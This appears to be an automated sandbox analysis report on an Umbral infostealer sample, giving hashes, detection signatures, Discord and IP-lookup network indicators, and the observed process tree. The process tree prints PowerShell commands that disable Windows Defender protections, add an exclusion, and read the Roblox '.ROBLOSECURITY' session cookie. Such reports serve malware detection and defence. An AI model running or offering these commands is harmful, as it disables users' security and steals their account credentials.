Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
03-02-2025 16:50
Behavioral task
behavioral1
Sample
CrypticBootstrapper.exe
Resource
win7-20241010-en
General
-
Target
CrypticBootstrapper.exe
-
Size
235KB
-
MD5
6ead93b6a9556b1fb06864131b2f5593
-
SHA1
fa1b1a247aa197036c94667e9f3c0ed8d79a22bc
-
SHA256
2c00e70fba3fc1ba12f7651d73a23c1294c684c507742c754f9460ecdcdf5fc6
-
SHA512
8a388cdcb275afd74b1f7320f8d0882847ae88a949924603022e7e7c6dd855f8004166119f7f3a9aff54ff83ce0264dd25d17338071e4137e6a25a5ce2764202
-
SSDEEP
6144:rloZMLrIkd8g+EtXHkv/iD4HbmedLocDXabtIExfHb8e1mILKpi:poZ0L+EP8HbmedLocDXabtIExrfKw
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/1980-1-0x0000000000A80000-0x0000000000AC0000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1908 powershell.exe 2880 powershell.exe 2824 powershell.exe 2804 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts CrypticBootstrapper.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 9 discord.com 10 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2104 wmic.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1980 CrypticBootstrapper.exe 1908 powershell.exe 2880 powershell.exe 2824 powershell.exe 572 powershell.exe 2804 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1980 CrypticBootstrapper.exe Token: SeIncreaseQuotaPrivilege 2516 wmic.exe Token: SeSecurityPrivilege 2516 wmic.exe Token: SeTakeOwnershipPrivilege 2516 wmic.exe Token: SeLoadDriverPrivilege 2516 wmic.exe Token: SeSystemProfilePrivilege 2516 wmic.exe Token: SeSystemtimePrivilege 2516 wmic.exe Token: SeProfSingleProcessPrivilege 2516 wmic.exe Token: SeIncBasePriorityPrivilege 2516 wmic.exe Token: SeCreatePagefilePrivilege 2516 wmic.exe Token: SeBackupPrivilege 2516 wmic.exe Token: SeRestorePrivilege 2516 wmic.exe Token: SeShutdownPrivilege 2516 wmic.exe Token: SeDebugPrivilege 2516 wmic.exe Token: SeSystemEnvironmentPrivilege 2516 wmic.exe Token: SeRemoteShutdownPrivilege 2516 wmic.exe Token: SeUndockPrivilege 2516 wmic.exe Token: SeManageVolumePrivilege 2516 wmic.exe Token: 33 2516 wmic.exe Token: 34 2516 wmic.exe Token: 35 2516 wmic.exe Token: SeIncreaseQuotaPrivilege 2516 wmic.exe Token: SeSecurityPrivilege 2516 wmic.exe Token: SeTakeOwnershipPrivilege 2516 wmic.exe Token: SeLoadDriverPrivilege 2516 wmic.exe Token: SeSystemProfilePrivilege 2516 wmic.exe Token: SeSystemtimePrivilege 2516 wmic.exe Token: SeProfSingleProcessPrivilege 2516 wmic.exe Token: SeIncBasePriorityPrivilege 2516 wmic.exe Token: SeCreatePagefilePrivilege 2516 wmic.exe Token: SeBackupPrivilege 2516 wmic.exe Token: SeRestorePrivilege 2516 wmic.exe Token: SeShutdownPrivilege 2516 wmic.exe Token: SeDebugPrivilege 2516 wmic.exe Token: SeSystemEnvironmentPrivilege 2516 wmic.exe Token: SeRemoteShutdownPrivilege 2516 wmic.exe Token: SeUndockPrivilege 2516 wmic.exe Token: SeManageVolumePrivilege 2516 wmic.exe Token: 33 2516 wmic.exe Token: 34 2516 wmic.exe Token: 35 2516 wmic.exe Token: SeDebugPrivilege 1908 powershell.exe Token: SeDebugPrivilege 2880 powershell.exe Token: SeDebugPrivilege 2824 powershell.exe Token: SeDebugPrivilege 572 powershell.exe Token: SeIncreaseQuotaPrivilege 3036 wmic.exe Token: SeSecurityPrivilege 3036 wmic.exe Token: SeTakeOwnershipPrivilege 3036 wmic.exe Token: SeLoadDriverPrivilege 3036 wmic.exe Token: SeSystemProfilePrivilege 3036 wmic.exe Token: SeSystemtimePrivilege 3036 wmic.exe Token: SeProfSingleProcessPrivilege 3036 wmic.exe Token: SeIncBasePriorityPrivilege 3036 wmic.exe Token: SeCreatePagefilePrivilege 3036 wmic.exe Token: SeBackupPrivilege 3036 wmic.exe Token: SeRestorePrivilege 3036 wmic.exe Token: SeShutdownPrivilege 3036 wmic.exe Token: SeDebugPrivilege 3036 wmic.exe Token: SeSystemEnvironmentPrivilege 3036 wmic.exe Token: SeRemoteShutdownPrivilege 3036 wmic.exe Token: SeUndockPrivilege 3036 wmic.exe Token: SeManageVolumePrivilege 3036 wmic.exe Token: 33 3036 wmic.exe Token: 34 3036 wmic.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 1980 wrote to memory of 2516 1980 CrypticBootstrapper.exe 30 PID 1980 wrote to memory of 2516 1980 CrypticBootstrapper.exe 30 PID 1980 wrote to memory of 2516 1980 CrypticBootstrapper.exe 30 PID 1980 wrote to memory of 1908 1980 CrypticBootstrapper.exe 33 PID 1980 wrote to memory of 1908 1980 CrypticBootstrapper.exe 33 PID 1980 wrote to memory of 1908 1980 CrypticBootstrapper.exe 33 PID 1980 wrote to memory of 2880 1980 CrypticBootstrapper.exe 35 PID 1980 wrote to memory of 2880 1980 CrypticBootstrapper.exe 35 PID 1980 wrote to memory of 2880 1980 CrypticBootstrapper.exe 35 PID 1980 wrote to memory of 2824 1980 CrypticBootstrapper.exe 37 PID 1980 wrote to memory of 2824 1980 CrypticBootstrapper.exe 37 PID 1980 wrote to memory of 2824 1980 CrypticBootstrapper.exe 37 PID 1980 wrote to memory of 572 1980 CrypticBootstrapper.exe 39 PID 1980 wrote to memory of 572 1980 CrypticBootstrapper.exe 39 PID 1980 wrote to memory of 572 1980 CrypticBootstrapper.exe 39 PID 1980 wrote to memory of 3036 1980 CrypticBootstrapper.exe 41 PID 1980 wrote to memory of 3036 1980 CrypticBootstrapper.exe 41 PID 1980 wrote to memory of 3036 1980 CrypticBootstrapper.exe 41 PID 1980 wrote to memory of 2192 1980 CrypticBootstrapper.exe 43 PID 1980 wrote to memory of 2192 1980 CrypticBootstrapper.exe 43 PID 1980 wrote to memory of 2192 1980 CrypticBootstrapper.exe 43 PID 1980 wrote to memory of 2932 1980 CrypticBootstrapper.exe 45 PID 1980 wrote to memory of 2932 1980 CrypticBootstrapper.exe 45 PID 1980 wrote to memory of 2932 1980 CrypticBootstrapper.exe 45 PID 1980 wrote to memory of 2804 1980 CrypticBootstrapper.exe 47 PID 1980 wrote to memory of 2804 1980 CrypticBootstrapper.exe 47 PID 1980 wrote to memory of 2804 1980 CrypticBootstrapper.exe 47 PID 1980 wrote to memory of 2104 1980 CrypticBootstrapper.exe 49 PID 1980 wrote to memory of 2104 1980 CrypticBootstrapper.exe 49 PID 1980 wrote to memory of 2104 1980 CrypticBootstrapper.exe 49
Processes
-
C:\Users\Admin\AppData\Local\Temp\CrypticBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\CrypticBootstrapper.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrypticBootstrapper.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:572
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3036
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:2192
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:2932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2804
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2104
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f9ee66662411741bd6baaa2a8c447410
SHA1c8dbcad9dad3d887c9268ef4360521f7c1422587
SHA25647186cac0fdb5ddc20479410bedcf5012255e1d531e341861e0c8694c0cee19b
SHA5122979ae5175c84456dd978da0abf69bb10302f8748f9c754806e402562d8676257d41ad2ed3a8bc19eaf1e438fc77e2cf6f503ec15635d4c019e50ed68b2a3bd0